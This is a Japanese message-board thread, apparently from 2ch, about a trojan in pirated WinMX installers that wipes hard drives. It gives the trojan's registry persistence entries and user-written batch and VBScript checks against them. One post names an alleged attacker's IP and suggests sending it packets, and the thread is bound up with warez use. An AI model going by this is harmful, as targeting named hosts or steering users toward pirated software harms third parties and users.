いきなり発動して。

オンラインウイルススキャンもすべて引っかからず。
もちろんFINALDATAも役立たず。

211.56.136.183　　
こいつが毎日ウィルスを送ってくる・・・。

>>849
http://www.soft4ever.com/security_test/En/index.htm
からyalta.zipを落とす。適当なフォルダへ解凍後 yalta.exe を起動、

Target IP Address:そいつのIPアドレス
text to send:ウイルス送ってくんなヴォケ！（←韓国語で）

これを各portへ向けて Leak Testで送ってみよう！
ひょっとしたら読んでくれるかもしれないよ。

>>845
もっと詳しく情報きぼんぬ

>>849
ウイルスを送ってるってどうして分かるのでしょうか？
教えてﾁｬｿでｽﾏｿ。

>>851

いきなりWordXPに何かエラーが出だして、
再起動したらHDDがフォルダだけ残して
からっぽに。
FINALDATAでのぞいてもすべてのデータが33バイトに。

ただ、この症状のウイルスに亜種が多いみたいで
どれかは今だ分からず。

とりあえず、ウイルススキャンでは発見できず、
何回も再起動してても何の症状も現れず、
いきなり発症した。

「落としてはいけない物リスト」作者です

こちらでもmx関連の話題が多いようなので、念のため貼っておきます。参考にしてください。
（このスレ＋Download板のトロイスレ1〜3の情報をコピペしてあります）

　http://www.clickjump.net/mx
　http://mxtrojan.tripod.com/
　http://www.geocities.com/mxtrojan/

（私はすでにmxからは引退した身なので、次回更新は未定です）
中にはネタ情報が含まれているかもしれませんが、、HDD全消去には気を付けましょうです・・

>>854
にいろいろあげてくれているようなんだけど
当方、「DriveImage for CD-R」でやられたんで
追加しておいてほしいな、と思った今日この頃。

>>855
俺も昨日HDDがふっとんだところなんだけど、
ウイルススキャンにはかからなかったよね？

いやあ

警戒なんかしてなかったんで
そのままインストール→HDD消去ですよ。兄貴

>>857

まあウイルススキャンにはどうせひっかからないらしいから
一緒だけどね（ｗ

俺は時限式で急にドカン！！（ｗ
再起動してすぐに発動ならアプリ特定出来たんだけど・・・

WAREZに仕込まれてるトロイやウイルスじゃ発見駆除ツール業者に報告するわけにも行かないから対応はなしか？

>>859
案外、これらのウイルスはソフトメーカーが仕込んでいたりしてね。

そして伝説へ・・・

スタートアップで確認できるんじゃなかったの？？？

>>862

OSを終了するごとに毎回確認するなら大丈夫な気がする・・
アプリのインストール後だけなら時限式には対応できないような。

そのウイルス持ってねーか？

時限式・・・・ｺﾜ

「W32.Whiter.Trojan」　症状と対策
症状：OS起動後(ログオン後）、HDDに激しくアクセス。デスクトップのアイコンが
消えたり、使用中のソフトにアクセスできないというエラーが出る。フォルダのみ
を残して全ファイルが削除されている。ネットワークドライブに割り当てられている、
LAN上のドライブも同じように削除される。OSを終了すると二度と起動しない。
修復ソフトなどでファイルを復活させるとすべて33バイトになっており、
事実上復活不可能。


原因： Whiterウイルス＝インストーラー等に仕込まれており、知らずに実行すると
感染する。このウイルスが -next のコマンドライン引数で実行されると、
ファイルサイズを0バイトにしたあと削除するため、フォルダのみを残し全ファイルが削除される。
Adobe製品やLightwave、エロゲなど、感染源多数。


対策：インストールした後(必ずOSを終了する前)、レジストリの以下のキーを調べる。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Whistler %System%\whismng.exe -next
という記述があればすでに感染している。すぐにそのキーを削除すればよい。
別の方法としては、システムフォルダ内にwhismng.exeがないか調べる。
あれば削除、もしくは別の場所に移動する。ただし名前を変えられると
この方法は使えない。OSを再起動してからでは手遅れになるので注意。
また、ノートン先生はこのウイルスを検出できるらしい(未確認)。
参考ページ　http://www.symantec.com/region/jp/sarcj/data/w/w32.whiter.trojan.html

ｺﾘｬｺｴｰ

何がどうあれ、コレでOKやろ。
http://www.puchiwara.com/hacking/
なぁ、諸君。

とりあえず厨房サイトの宣伝やめてくれ。

>>853
そのXPが拾い物だったっていうオチじゃないだろな(;´Д`)

>>870

ハハハ。
そのWordは売ってるやつなので大丈夫。

ガイシュツだったらすまん。
「レジストリとスタートアップを確認して電源を切る」専用プログラムを用意。
で、電源切るときにはその専用プログラムを使って切るようにすれば
問題ないんじゃないの？
（もちろん新種・亜種には対応しにくいが）
ダメな理由があるんなら教えてくれ。
そういうプログラムを作ってみたい。

要するにインストーラが必要ないものには関係無いって理解でいい？

>>872
＞そういうプログラムを作ってみたい。

ｶｺｲｲ!!

>>874
2ch初発言でこんな嬉しいコメントもらえると思わなかった。
ありがとう。

アイディアだけでプログラム自体は簡単なはず。
ここを見ている方の中で。VBscript使える人いない？
（その前にVBscriptで電源offって可能なのか？）
このウイルス限定ならおそらく20行もあれば書けない？
ここに張り付ければみんな使える

レジストリではなくファイルで検索として

c:\windows\system\whismng.exeファイルが
有り→W32.Whiter.Trojan 疑惑の為電源off中止
無し→電源off

だけだよね？

欲しがっている人がいるんなら
vbsちょっと勉強すっかなぁ

※コピーユーザの方を守るために作りたい訳ではない。
（一応ソフト作って食べている者だから。mxも使ってないし）
ただ「全部消す」ってやり方が私にはど〜しても気に入らない

うぁ・・・漏れもやられたYo・・・鬱だ氏のう・・・
メールで来たっぽい・・・ノー�d先生何も教えてくれなかった（；´Д｀）
125GB全部パーに。バクアプ取ってなかった。。。
FinalDataも使えん。エンタープライズ版ならできるのかなぁ・・・
しばらく、立ち直れない・・・

>>876
詳しい情報キ・ボンヌ。

ここでHD消しちゃった人見てると微笑ましいよ
俺なんて故意に感染させたとき以外は一度もウイルス、トロイにかかったことないよ
メール添付型ですらね。

何のソフトだったか忘れたけど、いかにも怪しいファイルがあって、
付属の説明文もあやしい解説不足なやつだった。
感染しないだろうとか感染しても被害なんて無いよなんて思いながら起動したら
インストーラーみたいなのを吐き出して、
何だろうと思ってインストさせたら十個近いファイルをインストしたらしい動作。
フリーズしたので何の疑いもなくいつもの再起動
。。。と思ったらデスクトップからありとあらゆるアイコンが消滅（藁
再起動させれば直るかと思って再起動させるとあらゆる動作を許さないように
起動時にツールバーやエクスプローラー（システム内部の方のやつ）を
一切起動できないようにしてあった。
おかげで起動後はデスクトップとポインタだけだった。

結局とある方法でそれらの原因となるファイルを消して何事も無かったかの様に今に至る。
損害ゼロ。あると言えばどうしようか考えた時間くらい。

楽しい一日でした

>>876
もっと詳しい情報書いてください。
MXとか割れ物はやっていませんか？
それなのに消えたんですか？

>>878
コピペ？

俺もやられたよ……60GBが全滅……鬱だ……。
MXだよ、MX。確かここ数日はいくつかの小ファイルを落としてたから
それらだと思うけど。FINAL DATA使っても復活できたのは殆ど無か
った……。

ただ、CD革命に入れてたFCDだけは無事だった。まだ試してないけ
どちゃんと使えるっぽい。なんでだろ？　CDと認識されて消されんか
ったんかな。

結構、やられている人多いんだね。
俺もやられた。

インストールしようとしたアプリは、特打英単語470点。
インストーラを起動すると、ＨＤＤが激しく動き出して全てのデータが消去！！
ちなみに、AVG AntiVirusには引っかからなかった。
初めて感染したので、ショックと衝撃で笑うしかできなかったよ。

今、再セットアップが終わったところ…。
いい教訓になった。

>>877
ドライブにマウント中のFCDファイルは消せない
マウントしてから手動削除を試してみればいい

MX落としたEXEファイルなんて怖くて実行できません。（一度やられてるし）
動画とか、画像とか、音楽とか、そういうのにとどめておいたほうがいいよ。
ソフトは買うのが一番安心。

ゲームデータで騒ぐ奴がわからねえ

＆age

>>884
ゲームデータって何？そんな言葉無いぞ。

>>875
意外とこういうレスから有能なプログラマが生まれたりするらしい
ｶﾞﾑﾊﾞﾚ

>>883
動画もやばいらしいよ。

>>872
漏れも WSH 多少使っているので作ってみるよ。

>>888
飯島愛のあの噂でしょ？
あれはasfの拡張子がmpgと書き換えられていて、
メディアプレイヤーのホールを利用したやり方だね。
でも今はそのホールは無いし、そもそも動画をメディアプレイヤーでは
再生しない。

>>890
>そもそも動画をメディアプレイヤーでは
>再生しない。

何で再生してんの？

>>891
プレイヤーなんていろいろあるじゃん。
メディアプレイヤーなんて重くて使う気にならん。

俺はKBMプレイヤー。

条件付き電源off終了プログラム
(c:\windows\system\whismng.exeがあれば電源offしない)
chkoff.batというファイルを（メモ帳などで）新規作成し
以下をコピーして下さい

@echo off
if exist c:\windows\system\whismng.exe goto ng
goto ok
:ng
echo ウイルスかも？電源offは中止した
goto bend
:ok
RUNDLL32.EXE Shell32.dll,SHExitWindowsEx 1
:bend

使い方はchkoff.batを起動するだけ。
見て分かるかも知れませんが
if exist c:\windows\system\whismng.exe goto ng
で c:\windows\system\whismng.exe があれば電源offしないだけ
（当たり前ですが他のウイルスには無防備です）

後はvbs使える人に任せる
（だって。BATなんてｶｺﾜﾙすぎる。これをプログラムと言っていいのかぁ？）

多分、w95,w98,meでは動作し nt,2000,xpでは動作しないと思う。

で、他にウイルスが増えた場合は追加すればｏｋです。
例えば「極悪ウイルス。c:\windows\gokuaku.dllがあれば感染」
なんて情報があれば

if exist c:\windows\system\whismng.exe goto ng
if exist c:\windows\gokuaku.dll goto ng
goto ok

という行を追加すればok.

…神は無理か…民くらいにはなれただろうか…

887>>
ありがとう。時間無いからこれくらいで勘弁して。
dosはそこそこぷろぐらまの自信あるが
Windowsはダメダメぷろぐらまの自信があって
これくらいしかすぐには作れない

889>>
ぜひこのbatをwsh版にしてください
whismngが無ければ電源offの目的は達成しているけど
いきなりdosプロンプトが出たりしてｶｺﾜﾙｽｷﾞﾙ
お願いします

>>866
ありがとうございました！！
ついさっきウイルスにかかって途方にくれていたところだったのです！！！

教えてくれたやり方で無理無くファイルを削除して
再起動かけて何とか生還しました！
本当にありがとうございました！！！

>>895
再起動する前に、気がついたの？
なぜ？

ウイルス入りのソフト共有してる人は、ウイルス入りだってことに気づいてるの？
っていうか、このウイルスは他のファイルに感染しないんだよね？
だとしたら、わざとウイルス入れて共有してる？？？

c:\windows\system\whismng.exeというディレクトリ作ってそん中に適当なファイル2,3個ほっぽりこんどきゃ防げるだろ。

>>897
集めてるだけで起動しないコレクターも居るんじゃない。
あと交換用のネタとして持ってるとか。

>>896
何かよくわからないとこに行っちゃって
なにかよくわからないものインストールしちゃって

再起動しますかって聞かれたから、なにか怪しいウイルスか！！
と思ってスキャンかけてもなにもでなくて
でもなんかやな感じだったのでここをウロウロしてたら

>>866
の記事を読んで検索して調べたら案の定ウイルスでした。
あとは記事のとうりにして
再起動かけました。

もうかなり怖いのでなにか対策ソフトを買うことにします。

>>898
誰かの良レスが埋もれてる・・・・・・・

ファイル名が同じファイルは上書きできるけど、新規のファイル名と同じ名前のフォルダが存在するディレクトリには、新しくファイルを作成できないんですよね。

VBScript で書いてみた。
テキストエディタにコピーして拡張子を vbs にして保存。
ダブルクリックで実行できます。
レジストリキーの
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
を調べます。再起動する前に実行すれば気休めにはなるかも。
----------------------
On Error Resume Next
Dim Troj, i, ret, flag
flag = False

Troj = Array("Whistler", "WinSvc", "Krn132")

Set WshSHell = WScript.CreateObject("WScript.Shell")

key = "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

For Each i in Troj
ret = WshShell.RegRead(key & i)
If ret <> "" Then
WScript.Echo i & " に感染中"
flag = True
End If
ret = ""
Next

If Flag = Flase Then
WScript.Echo "たぶん感染してません"
End If

>>901
2,3個(1個でも構わんが)ほっぽり込んどくのはunlinkされたときの用心。

>>903
同様にうちも、怪しい名前のフォルダがたくさんあります。

>>893 >>902
ご苦労様です｡自分の様にスキルのない人間のためにありがとうございます｡
俺も少しは勉強せねば・・・

>>902
どうせなら、起動時に自動実行するものを保存、落とす時に比較した方が良かねーか?

>898
感心したよ。賢いね。
後は皆で亜種のファイル名の報告をしよう。

>>906
最初はそうしようと思ったんだけど VBScript はレジストリの
キーの下にある値の一覧を取得することができないんです。
だから既知の trojan の使う値を決めうちして調べてるんです。
中途半端でｽﾏｿ

>>908
あぁ本当だ。なんて中途半端なオブジェクトなんだ >WshShell

>>902
NAVが危険だと警告してます

2000の場合は、
c:\winnt\system32\whismng.exe

でいいのかな？

昨日MXでダウンロードしたVirtualPC4.2に同種のワームを発見したよ。
ダウンロードした時にやたらと
そいつは「ソフトウェアない？」とか「ゲームない？」とか聞いてきやがったよ。
ひょっとしてどっかの組織の回し者か？

--------------------------------------
解除方法はコレネ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここに
Piracy c:\WINNT\System32\winsvc.exe -n
がある。これを削除

(追加情報）
ファイル名：Connectix Virtual PC 4.2 日本語版.zip
サイズ：14,496,062

>>912
違法ソフトを抹消するためにACCSが流しているのだろうか。
こんな事が続くと誰しも本物を買わざるを得ないと思う。

>>912
単に交換したかっただけと違うの？

>>914
そのために人柱が居るのだろう。

まぁ一台テスト用マシンを用意すればいいだけなんだけどね。

早速winsvc.exeというフォルダを作らなきゃね。